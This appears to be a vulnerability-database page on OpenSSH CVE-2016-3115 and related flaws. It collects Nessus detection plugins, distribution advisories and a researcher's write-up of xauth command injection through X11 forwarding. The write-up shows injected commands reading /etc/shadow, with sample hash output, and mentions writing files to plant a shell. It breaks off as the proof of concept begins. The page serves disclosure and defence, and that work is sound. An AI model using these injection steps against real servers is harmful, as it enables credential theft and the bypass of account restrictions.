rpm_check(release:"SUSE42.1", reference:"openssh-fips-6.6p1-11.1") ) flag++; if ( rpm_check(release:"SUSE42.1", reference:"openssh-helpers-6.6p1-11.1") ) flag++; if ( rpm_check(release:"SUSE42.1", reference:"openssh-helpers-debuginfo-6.6p1-11.1") ) flag++; if (flag) { if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get()); else security_hole(0); exit(0); } else { tested = pkg_tests_get(); if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested); else audit(AUDIT_PACKAGE_NOT_INSTALLED, "openssh-askpass-gnome / openssh-askpass-gnome-debuginfo / openssh / etc"); }
NASL family Red Hat Local Security Checks NASL id REDHAT-RHSA-2016-0466.NASL description Updated openssh packages that fix two security issues are now available for Red Hat Enterprise Linux 6. Red Hat Product Security has rated this update as having Moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section. OpenSSH is OpenBSD last seen 2020-06-01 modified 2020-06-02 plugin id 90079 published 2016-03-22 reporter This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/90079 title RHEL 6 : openssh (RHSA-2016:0466) code # # (C) Tenable Network Security, Inc. # # The descriptive text and package checks in this plugin were # extracted from Red Hat Security Advisory RHSA-2016:0466. The text # itself is copyright (C) Red Hat, Inc. # include("compat.inc"); if (description) { script_id(90079); script_version("2.10"); script_cvs_date("Date: 2019/10/24 15:35:41"); script_cve_id("CVE-2015-5600", "CVE-2016-3115"); script_xref(name:"RHSA", value:"2016:0466"); script_name(english:"RHEL 6 : openssh (RHSA-2016:0466)"); script_summary(english:"Checks the rpm output for the updated packages"); script_set_attribute( attribute:"synopsis", value:"The remote Red Hat host is missing one or more security updates." ); script_set_attribute( attribute:"description", value: "Updated openssh packages that fix two security issues are now available for Red Hat Enterprise Linux 6. Red Hat Product Security has rated this update as having Moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section. OpenSSH is OpenBSD's SSH (Secure Shell) protocol implementation. These packages include the core files necessary for both the OpenSSH client and server. It was discovered that the OpenSSH server did not sanitize data received in requests to enable X11 forwarding. An authenticated client with restricted SSH access could possibly use this flaw to bypass intended restrictions. (CVE-2016-3115) It was discovered that the OpenSSH sshd daemon did not check the list of keyboard-interactive authentication methods for duplicates. A remote attacker could use this flaw to bypass the MaxAuthTries limit, making it easier to perform password guessing attacks. (CVE-2015-5600) All openssh users are advised to upgrade to these updated packages, which contain backported patches to correct these issues. After installing this update, the OpenSSH server daemon (sshd) will be restarted automatically." ); script_set_attribute( attribute:"see_also", value:"https://access.redhat.com/errata/RHSA-2016:0466" ); script_set_attribute( attribute:"see_also", value:"https://access.redhat.com/security/cve/cve-2015-5600" ); script_set_attribute( attribute:"see_also", value:"https://access.redhat.com/security/cve/cve-2016-3115" ); script_set_attribute(attribute:"solution", value:"Update the affected packages."); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:C"); script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C"); script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N"); script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"plugin_type", value:"local"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:openssh"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:openssh-askpass"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:openssh-clients"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:openssh-debuginfo"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:openssh-ldap"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:openssh-server"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:pam_ssh_agent_auth"); script_set_attribute(attribute:"cpe", value:"cpe:/o:redhat:enterprise_linux:6"); script_set_attribute(attribute:"cpe", value:"cpe:/o:redhat:enterprise_linux:6.7"); script_set_attribute(attribute:"vuln_publication_date", value:"2015/08/02"); script_set_attribute(attribute:"patch_publication_date", value:"2016/03/21"); script_set_attribute(attribute:"plugin_publication_date", value:"2016/03/22"); script_set_attribute(attribute:"generated_plugin", value:"current"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_copyright(english:"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof."); script_family(english:"Red Hat Local Security Checks"); script_dependencies("ssh_get_info.nasl"); script_require_keys("Host/local_checks_enabled", "Host/RedHat/release", "Host/RedHat/rpm-list", "Host/cpu"); exit(0); } include("audit.inc"); include("global_settings.inc"); include("misc_func.inc"); include("rpm.inc"); if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED); release = get_kb_item("Host/RedHat/release"); if (isnull(release) || "Red Hat" >!< release) audit(AUDIT_OS_NOT, "Red Hat"); os_ver = pregmatch(pattern: "Red Hat Enterprise Linux.*release ([0-9]+(\.[0-9]+)?)", string:release); if (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, "Red Hat"); os_ver = os_ver[1]; if (! preg(pattern:"^6([^0-9]|$)", string:os_ver)) audit(AUDIT_OS_NOT, "Red Hat 6.x", "Red Hat " + os_ver); if (!get_kb_item("Host/RedHat/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING); cpu = get_kb_item("Host/cpu"); if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH); if ("x86_64" >!< cpu && cpu !~ "^i[3-6]86$" && "s390" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "Red Hat", cpu); yum_updateinfo = get_kb_item("Host/RedHat/yum-updateinfo"); if (!empty_or_null(yum_updateinfo)) { rhsa = "RHSA-2016:0466"; yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa); if (!empty_or_null(yum_report)) { security_report_v4( port : 0, severity : SECURITY_HOLE, extra : yum_report ); exit(0); } else { audit_message = "affected by Red Hat security advisory " + rhsa; audit(AUDIT_OS_NOT, audit_message); } } else { flag = 0; if (rpm_check(release:"RHEL6", cpu:"i686", reference:"openssh-5.3p1-114.el6_7")) flag++; if (rpm_check(release:"RHEL6", cpu:"s390x", reference:"openssh-5.3p1-114.el6_7")) flag++; if (rpm_check(release:"RHEL6", cpu:"x86_64", reference:"openssh-5.3p1-114.el6_7")) flag++; if (rpm_check(release:"RHEL6", cpu:"i686", reference:"openssh-askpass-5.3p1-114.el6_7")) flag++; if (rpm_check(release:"RHEL6", cpu:"s390x", reference:"openssh-askpass-5.3p1-114.el6_7")) flag++; if (rpm_check(release:"RHEL6", cpu:"x86_64", reference:"openssh-askpass-5.3p1-114.el6_7")) flag++; if (rpm_check(release:"RHEL6", cpu:"i686", reference:"openssh-clients-5.3p1-114.el6_7")) flag++; if (rpm_check(release:"RHEL6", cpu:"s390x", reference:"openssh-clients-5.3p1-114.el6_7")) flag++; if (rpm_check(release:"RHEL6", cpu:"x86_64", reference:"openssh-clients-5.3p1-114.el6_7")) flag++; if (rpm_check(release:"RHEL6", reference:"openssh-debuginfo-5.3p1-114.el6_7")) flag++; if (rpm_check(release:"RHEL6", cpu:"i686", reference:"openssh-ldap-5.3p1-114.el6_7")) flag++; if (rpm_check(release:"RHEL6", cpu:"s390x", reference:"openssh-ldap-5.3p1-114.el6_7")) flag++; if (rpm_check(release:"RHEL6", cpu:"x86_64", reference:"openssh-ldap-5.3p1-114.el6_7")) flag++; if (rpm_check(release:"RHEL6", cpu:"i686", reference:"openssh-server-5.3p1-114.el6_7")) flag++; if (rpm_check(release:"RHEL6", cpu:"s390x", reference:"openssh-server-5.3p1-114.el6_7")) flag++; if (rpm_check(release:"RHEL6", cpu:"x86_64", reference:"openssh-server-5.3p1-114.el6_7")) flag++; if (rpm_check(release:"RHEL6", reference:"pam_ssh_agent_auth-0.9.3-114.el6_7")) flag++; if (flag) { security_report_v4( port : 0, severity : SECURITY_HOLE, extra : rpm_report_get() + redhat_report_package_caveat() ); exit(0); } else { tested = pkg_tests_get(); if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested); else audit(AUDIT_PACKAGE_NOT_INSTALLED, "openssh / openssh-askpass / openssh-clients / openssh-debuginfo / etc"); } }
NASL family Gentoo Local Security Checks NASL id GENTOO_GLSA-201612-18.NASL description The remote host is affected by the vulnerability described in GLSA-201612-18 (OpenSSH: Multiple vulnerabilities) Multiple vulnerabilities have been discovered in OpenSSH. Please review the CVE identifiers referenced below for details. Impact : Remote attackers could cause Denial of Service and conduct user enumeration. Workaround : There is no known workaround at this time. last seen 2020-06-01 modified 2020-06-02 plugin id 95604 published 2016-12-07 reporter This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/95604 title GLSA-201612-18 : OpenSSH: Multiple vulnerabilities code # # (C) Tenable Network Security, Inc. # # The descriptive text and package checks in this plugin were # extracted from Gentoo Linux Security Advisory GLSA 201612-18. # # The advisory text is Copyright (C) 2001-2018 Gentoo Foundation, Inc. # and licensed under the Creative Commons - Attribution / Share Alike # license. See http://creativecommons.org/licenses/by-sa/3.0/ # include("compat.inc"); if (description) { script_id(95604); script_version("3.4"); script_cvs_date("Date: 2019/04/11 17:23:06"); script_cve_id("CVE-2015-8325", "CVE-2016-1908", "CVE-2016-3115", "CVE-2016-6210", "CVE-2016-8858"); script_xref(name:"GLSA", value:"201612-18"); script_name(english:"GLSA-201612-18 : OpenSSH: Multiple vulnerabilities"); script_summary(english:"Checks for updated package(s) in /var/db/pkg"); script_set_attribute( attribute:"synopsis", value: "The remote Gentoo host is missing one or more security-related patches." ); script_set_attribute( attribute:"description", value: "The remote host is affected by the vulnerability described in GLSA-201612-18 (OpenSSH: Multiple vulnerabilities) Multiple vulnerabilities have been discovered in OpenSSH. Please review the CVE identifiers referenced below for details. Impact : Remote attackers could cause Denial of Service and conduct user enumeration. Workaround : There is no known workaround at this time." ); script_set_attribute( attribute:"see_also", value:"https://security.gentoo.org/glsa/201612-18" ); script_set_attribute( attribute:"solution", value: "All OpenSSH users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose '>=net-misc/openssh-7.3_p1-r7'" ); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C"); script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C"); script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"); script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"plugin_type", value:"local"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:gentoo:linux:openssh"); script_set_attribute(attribute:"cpe", value:"cpe:/o:gentoo:linux"); script_set_attribute(attribute:"patch_publication_date", value:"2016/12/07"); script_set_attribute(attribute:"plugin_publication_date", value:"2016/12/07"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_copyright(english:"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof."); script_family(english:"Gentoo Local Security Checks"); script_dependencies("ssh_get_info.nasl"); script_require_keys("Host/local_checks_enabled", "Host/Gentoo/release", "Host/Gentoo/qpkg-list"); exit(0); } include("audit.inc"); include("global_settings.inc"); include("qpkg.inc"); if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED); if (!get_kb_item("Host/Gentoo/release")) audit(AUDIT_OS_NOT, "Gentoo"); if (!get_kb_item("Host/Gentoo/qpkg-list")) audit(AUDIT_PACKAGE_LIST_MISSING); flag = 0; if (qpkg_check(package:"net-misc/openssh", unaffected:make_list("ge 7.3_p1-r7"), vulnerable:make_list("lt 7.3_p1-r7"))) flag++; if (flag) { if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get()); else security_hole(0); exit(0); } else { tested = qpkg_tests_get(); if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested); else audit(AUDIT_PACKAGE_NOT_INSTALLED, "OpenSSH"); }
NASL family OracleVM Local Security Checks NASL id ORACLEVM_OVMSA-2016-0070.NASL description The remote OracleVM system is missing necessary patches to address critical security updates : - CVE-2015-5600: MaxAuthTries limit bypass via duplicates in KbdInteractiveDevices (John Haxby) [orabug 22985024] - CVE-2016-3115: missing sanitisation of input for X11 forwarding (John Haxby) [orabug 22985024] last seen 2020-06-01 modified 2020-06-02 plugin id 91750 published 2016-06-22 reporter This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/91750 title OracleVM 3.2 : openssh (OVMSA-2016-0070) NASL family Ubuntu Local Security Checks NASL id UBUNTU_USN-2966-1.NASL description Shayan Sadigh discovered that OpenSSH incorrectly handled environment files when the UseLogin feature is enabled. A local attacker could use this issue to gain privileges. (CVE-2015-8325) Ben Hawkes discovered that OpenSSH incorrectly handled certain network traffic. A remote attacker could possibly use this issue to cause OpenSSH to crash, resulting in a denial of service. This issue only applied to Ubuntu 15.10. (CVE-2016-1907) Thomas Hoger discovered that OpenSSH incorrectly handled untrusted X11 forwarding when the SECURITY extension is disabled. A connection configured as being untrusted could get switched to trusted in certain scenarios, contrary to expectations. (CVE-2016-1908) It was discovered that OpenSSH incorrectly handled certain X11 forwarding data. A remote authenticated attacker could possibly use this issue to bypass certain intended command restrictions. (CVE-2016-3115). Note that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues. last seen 2020-06-01 modified 2020-06-02 plugin id 91086 published 2016-05-12 reporter Ubuntu Security Notice (C) 2016-2019 Canonical, Inc. / NASL script (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/91086 title Ubuntu 12.04 LTS / 14.04 LTS / 15.10 : openssh vulnerabilities (USN-2966-1) NASL family Fedora Local Security Checks NASL id FEDORA_2016-188267B485.NASL description Sync with openssh package. Note that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues. last seen 2020-06-05 modified 2016-04-27 plugin id 90726 published 2016-04-27 reporter This script is Copyright (C) 2016-2020 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/90726 title Fedora 23 : gsi-openssh-7.2p2-1.fc23 (2016-188267b485) NASL family Misc. NASL id OPENSSH_72P2.NASL description According to its banner, the version of OpenSSH running on the remote host is prior to 7.2p2. It is, therefore, affected by a security bypass vulnerability due to improper sanitization of X11 authentication credentials. An authenticated, remote attacker can exploit this, via crafted credentials, to inject arbitrary xauth commands, resulting in gaining read and write access to arbitrary files, connecting to local ports, or performing further attacks on xauth itself. Note that exploiting this vulnerability requires X11Forwarding to have been enabled. last seen 2020-06-01 modified 2020-06-02 plugin id 90023 published 2016-03-18 reporter This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/90023 title OpenSSH < 7.2p2 X11Forwarding xauth Command Injection NASL family Scientific Linux Local Security Checks NASL id SL_20160321_OPENSSH_ON_SL7_X.NASL description It was discovered that the OpenSSH server did not sanitize data received in requests to enable X11 forwarding. An authenticated client with restricted SSH access could possibly use this flaw to bypass intended restrictions. (CVE-2016-3115) An access flaw was discovered in OpenSSH; the OpenSSH client did not correctly handle failures to generate authentication cookies for untrusted X11 forwarding. A malicious or compromised remote X application could possibly use this flaw to establish a trusted connection to the local X server, even if only untrusted X11 forwarding was requested. (CVE-2016-1908) After installing this update, the OpenSSH server daemon (sshd) will be restarted automatically. last seen 2020-03-18 modified 2016-03-22 plugin id 90081 published 2016-03-22 reporter This script is Copyright (C) 2016-2020 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/90081 title Scientific Linux Security Update : openssh on SL7.x x86_64 (20160321) NASL family Scientific Linux Local Security Checks NASL id SL_20160321_OPENSSH_ON_SL6_X.NASL description It was discovered that the OpenSSH server did not sanitize data received in requests to enable X11 forwarding. An authenticated client with restricted SSH access could possibly use this flaw to bypass intended restrictions. (CVE-2016-3115) It was discovered that the OpenSSH sshd daemon did not check the list of keyboard-interactive authentication methods for duplicates. A remote attacker could use this flaw to bypass the MaxAuthTries limit, making it easier to perform password guessing attacks. (CVE-2015-5600) After installing this update, the OpenSSH server daemon (sshd) will be restarted automatically. last seen 2020-03-18 modified 2016-03-22 plugin id 90080 published 2016-03-22 reporter This script is Copyright (C) 2016-2020 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/90080 title Scientific Linux Security Update : openssh on SL6.x i386/x86_64 (20160321) NASL family FreeBSD Local Security Checks NASL id FREEBSD_PKG_E4644DF8E7DA11E5829DC80AA9043978.NASL description The OpenSSH project reports : Missing sanitisation of untrusted input allows an authenticated user who is able to request X11 forwarding to inject commands to xauth(1). Injection of xauth commands grants the ability to read arbitrary files under the authenticated user last seen 2020-06-01 modified 2020-06-02 plugin id 89897 published 2016-03-14 reporter This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/89897 title FreeBSD : openssh -- command injection when X11Forwarding is enabled (e4644df8-e7da-11e5-829d-c80aa9043978) NASL family OracleVM Local Security Checks NASL id ORACLEVM_OVMSA-2016-0038.NASL description The remote OracleVM system is missing necessary patches to address critical security updates : - CVE-2015-5600: MaxAuthTries limit bypass via duplicates in KbdInteractiveDevices (#1245969) - CVE-2016-3115: missing sanitisation of input for X11 forwarding (#1317816) - SSH2_MSG_DISCONNECT for user initiated disconnect follow RFC 4253 (#1222500) - Add missing dot in ssh manual page (#1197763) - Fix minor problems found by covscan/gcc (#1196063) - Add missing options in man ssh (#1197763) - Add KbdInteractiveAuthentication documentation to man sshd_config (#1109251) - Correct freeing newkeys structure when privileged monitor exits (#1208584) - Fix problems with failing persistent connections (#1131585) - Fix memory leaks in auditing patch (#1208584) - Better approach to logging sftp commands in chroot - Make sshd -T write all config options and add missing Cipher, MAC to man (#1109251) - Add missing ControlPersist option to man ssh (#1197763) - Add sftp option to force mode of created files (#1191055) - Do not load RSA1 keys in FIPS mode (#1197072) - Add missing support for ECDSA in ssh-keyscan (#1196331) - Fix coverity/gcc issues (#1196063) - Backport wildcard functionality for PermitOpen in sshd_config file (#1159055) - Ability to specify an arbitrary LDAP filter in ldap.conf (#1119506) - Fix ControlPersist option with ProxyCommand (#1160487) - Backport fix of ssh-keygen with error : gethostname: File name too long (#1161454) - Backport show remote address instead of UNKNOWN after timeout at password prompt (#1161449) - Fix printing of extensions in v01 certificates (#1093869) - Fix confusing audit trail for unsuccessful logins (#1127312) - Don last seen 2020-06-01 modified 2020-06-02 plugin id 90076 published 2016-03-22 reporter This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/90076 title OracleVM 3.3 / 3.4 : openssh (OVMSA-2016-0038) NASL family Oracle Linux Local Security Checks NASL id ORACLELINUX_ELSA-2016-3531.NASL description Description of changes: [4.3p2-82.0.2] - CVE-2015-5600: MaxAuthTries limit bypass via duplicates in KbdInteractiveDevices (John Haxby) [orabug 22985024] - CVE-2016-3115: missing sanitisation of input for X11 forwarding (John Haxby) [orabug 22985024] last seen 2020-06-01 modified 2020-06-02 plugin id 90342 published 2016-04-05 reporter This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/90342 title Oracle Linux 5 : openssh (ELSA-2016-3531) NASL family Fedora Local Security Checks NASL id FEDORA_2016-0BCAB055A7.NASL description This update provides recent upstrem fix published with openssh-7.2p2 (#1316529). Note that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues. last seen 2020-06-05 modified 2016-03-28 plugin id 90209 published 2016-03-28 reporter This script is Copyright (C) 2016-2020 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/90209 title Fedora 24 : openssh-7.2p2-1.fc24 (2016-0bcab055a7) NASL family Fedora Local Security Checks NASL id FEDORA_2016-BB59DB3C86.NASL description This update provides recent upstream (security) release, sanitizing X11 authentication credentials. Note that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues. last seen 2020-06-05 modified 2016-03-14 plugin id 89887 published 2016-03-14 reporter This script is Copyright (C) 2016-2020 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/89887 title Fedora 23 : openssh-7.2p2-1.fc23 (2016-bb59db3c86) NASL family SuSE Local Security Checks NASL id SUSE_SU-2016-2388-1.NASL description This update for OpenSSH fixes the following issues : - Prevent user enumeration through the timing of password processing. (bsc#989363, CVE-2016-6210) - Allow lowering the DH groups parameter limit in server as well as when GSSAPI key exchange is used. (bsc#948902) - Sanitize input for xauth(1). (bsc#970632, CVE-2016-3115) - Prevent X11 SECURITY circumvention when forwarding X11 connections. (bsc#962313, CVE-2016-1908) - Disable DH parameters under 2048 bits by default and allow lowering the limit back to the RFC 4419 specified minimum through an option. (bsc#932483, bsc#948902) - Ignore PAM environment when using login. (bsc#975865, CVE-2015-8325) - Limit the accepted password length (prevents a possible denial of service). (bsc#992533, CVE-2016-6515) - Relax version requires for the openssh-askpass sub-package. (bsc#962794) - Avoid complaining about unset DISPLAY variable. (bsc#981654) - Initialize message id to prevent connection breakups in some cases. (bsc#959096) Note that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues. last seen 2020-06-01 modified 2020-06-02 plugin id 93735 published 2016-09-27 reporter This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/93735 title SUSE SLES11 Security Update : openssh (SUSE-SU-2016:2388-1) NASL family CentOS Local Security Checks NASL id CENTOS_RHSA-2016-0465.NASL description Updated openssh packages that fix two security issues are now available for Red Hat Enterprise Linux 7. Red Hat Product Security has rated this update as having Moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section. OpenSSH is OpenBSD last seen 2020-06-01 modified 2020-06-02 plugin id 90068 published 2016-03-22 reporter This script is Copyright (C) 2016-2020 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/90068 title CentOS 7 : openssh (CESA-2016:0465) NASL family AIX Local Security Checks NASL id AIX_OPENSSH_ADVISORY8.NASL description The remote AIX host has a version of OpenSSH installed that is affected by the following vulnerabilities : - A remote code execution vulnerability exists in the sshd server component of OpenSSH due to improper sanitization of X11 authentication credentials. An authenticated, remote attacker can exploit this vulnerability to inject arbitrary xauth commands. (CVE-2016-3115) - A security bypass vulnerability exists in the sshd server component of OpenSSH due to improper error handling. An authenticated, remote attacker can exploit this vulnerability, when an authentication cookie is generated during untrusted X11 forwarding, to gain access to the X server on the host system. (CVE-2016-1908) last seen 2020-06-01 modified 2020-06-02 plugin id 90942 published 2016-05-06 reporter This script is Copyright (C) 2016-2018 Tenable Network Security, Inc. source https://www.tenable.com/plugins/nessus/90942 title AIX OpenSSH Advisory : openssh_advisory8.asc NASL family Slackware Local Security Checks NASL id SLACKWARE_SSA_2016-070-01.NASL description New openssh packages are available for Slackware 13.0, 13.1, 13.37, 14.0, 14.1, and -current to fix security issues. last seen 2020-06-01 modified 2020-06-02 plugin id 89836 published 2016-03-11 reporter This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/89836 title Slackware 13.0 / 13.1 / 13.37 / 14.0 / 14.1 / current : openssh (SSA:2016-070-01)
Packetstorm
data source https://packetstormsecurity.com/files/download/136234/opensshfalse-bypass.txt id PACKETSTORM:136234 last seen 2016-12-05 published 2016-03-15 reporter INTREST SEC source https://packetstormsecurity.com/files/136234/OpenSSH-7.2p1-xauth-Command-Injection-Bypass.html title OpenSSH 7.2p1 xauth Command Injection / Bypass data source https://packetstormsecurity.com/files/download/140019/logstorm.py.txt id PACKETSTORM:140019 last seen 2016-12-05 published 2016-12-05 reporter Jeremy Brown source https://packetstormsecurity.com/files/140019/BlackStratus-LOGStorm-4.5.1.35-4.5.1.96-Remote-Root.html title BlackStratus LOGStorm 4.5.1.35 / 4.5.1.96 Remote Root
Redhat
advisories |
| ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
rpms |
|
Seebug
bulletinFamily | exploit |
description | 来源链接: https://github.com/tintinweb/pub/tree/master/pocs/cve-2016-3115 ### VuNote Author: <github.com/tintinweb> Ref: https://github.com/tintinweb/pub/tree/master/pocs/cve-2016-3115 Version: 0.2 Date: Mar 3rd, 2016 Tag: openssh xauth command injection may lead to forced-command and /bin/false bypass ### Overview Name: openssh Vendor: OpenBSD References: * http://www.openssh.com/[1] Version: 7.2p1 [2] Latest Version: 7.2p1 Other Versions: <= 7.2p1 (all versions; dating back ~20 years) Platform(s): linux Technology: c Vuln Classes: CWE-93 - Improper Neutralization of CRLF Sequences ('CRLF Injection') Origin: remote Min. Privs.: post auth CVE: CVE-2016-3115 ### Description quote website [1] >OpenSSH is the premier connectivity tool for remote login with the SSH protocol. It encrypts all traffic to eliminate eavesdropping, connection hijacking, and other attacks. In addition, OpenSSH provides a large suite of secure tunneling capabilities, several authentication methods, and sophisticated configuration options. ### Summary An authenticated user may inject arbitrary xauth commands by sending an x11 channel request that includes a newline character in the x11 cookie. The newline acts as a command separator to the xauth binary. This attack requires the server to have `X11Forwarding yes` enabled. Disabling it, mitigates this vector. By injecting xauth commands one gains limited* read/write arbitrary files, information leakage or xauth-connect capabilities. These capabilities can be leveraged by an authenticated restricted user - e.g. one with the login shell configured as /bin/false or one with configured forced-commands - to bypass account restriction. This is generally not expected. The injected xauth commands are performed with the effective permissions of the logged in user as the sshd already dropped its privileges. Quick-Info: * requires: X11Forwarding yes * bypasses /bin/false and forced-commands * OpenSSH does not treat /bin/false like /bin/nologin (in contrast to Dropbear) * does not bypass /bin/nologin (as there is special treatment for this) Capabilities (xauth): * Xauth * write file: limited chars, xauthdb format * read file: limit lines cut at first \s * infoleak: environment * connect to other devices (may allow port probing) see attached PoC, Patch ### Details // see annotated code below * server_input_channel_req (serverloop.c) *- session_input_channel_req:2299 (session.c [2]) *- session_x11_req:2181 * do_exec_pty or do_exec_no_pty *- do_child *- do_rc_files (session.c:1335 [2]) Upon receiving an `x11-req` type channel request sshd parses the channel request parameters `auth_proto` and `auth_data` from the client ssh packet where `auth_proto` contains the x11 authentication method used (e.g. `MIT-MAGIC-COOKIE-1`) and `auth_data` contains the actual x11 auth cookie. This information is stored in a session specific datastore. When calling `execute` on that session, sshd will call `do_rc_files` which tries to figure out if this is an x11 call by evaluating if `auth_proto` and `auth_data` (and `display`) are set. If that is the case AND there is no system `/sshrc` existent on the server AND it no user-specific `$HOME/.ssh/rc` is set, then `do_rc_files` will run `xauth -q -` and pass commands via `stdin`. Note that `auth_data` nor `auth_proto` was sanitized or validated, it just contains user-tainted data. Since `xauth` commands are passed via `stdin` and `\n` is a command-separator to the `xauth` binary, this allows a client to inject arbitrary `xauth` commands. Sidenote #1: in case sshd takes the `$HOME/.ssh/rc` branch, it will pass the tainted input as arguments to that script. Sidenote #2: client code also seems to not sanitize `auth_data`, `auth_proto`. [3] This is an excerpt of the `man xauth` [4] to outline the capabilities of this xauth command injection: SYNOPSIS xauth [ -f authfile ] [ -vqibn ] [ command arg ... ] add displayname protocolname hexkey generate displayname protocolname [trusted|untrusted] [timeout seconds] [group group-id] [data hexdata] [n]extract filename displayname... [n]list [displayname...] [n]merge [filename...] remove displayname... source filename info exit quit version help ? Interesting commands are: info - leaks environment information / path ~# xauth info xauth: file /root/.Xauthority does not exist Authority file: /root/.Xauthority File new: yes File locked: no Number of entries: 0 Changes honored: yes Changes made: no Current input: (argv):1 source - arbitrary file read (cut on first `\s`) # xauth source /etc/shadow xauth: file /root/.Xauthority does not exist xauth: /etc/shadow:1: unknown command "smithj:Ep6mckrOLChF.:10063:0:99999:7:::" extract - arbitrary file write * limited characters * in xauth.db format * since it is not compressed it can be combined with `xauth add` to first store data in the database and then export it to an arbitrary location e.g. to plant a shell or do other things. generate - connect to <ip>:<port> (port probing, connect back and pot. exploit vulnerabilities in X.org ### Source Inline annotations are prefixed with `//#!` ```c /* * Run $HOME/.ssh/rc, /etc/ssh/sshrc, or xauth (whichever is found * first in this order). */ static void do_rc_files(Session *s, const char *shell) { ... snprintf(cmd, sizeof cmd, "%s -q -", options.xauth_location); f = popen(cmd, "w"); //#! run xauth -q - if (f) { fprintf(f, "remove %s\n", //#! remove <user_tainted_data> - injecting \n auth_display injects xauth command s->auth_display); fprintf(f, "add %s %s %s\n", //#! \n injection s->auth_display, s->auth_proto, s->auth_data); pclose(f); } else { fprintf(stderr, "Could not run %s\n", cmd); } } } ``` ### Proof of Concept Prerequisites: * install 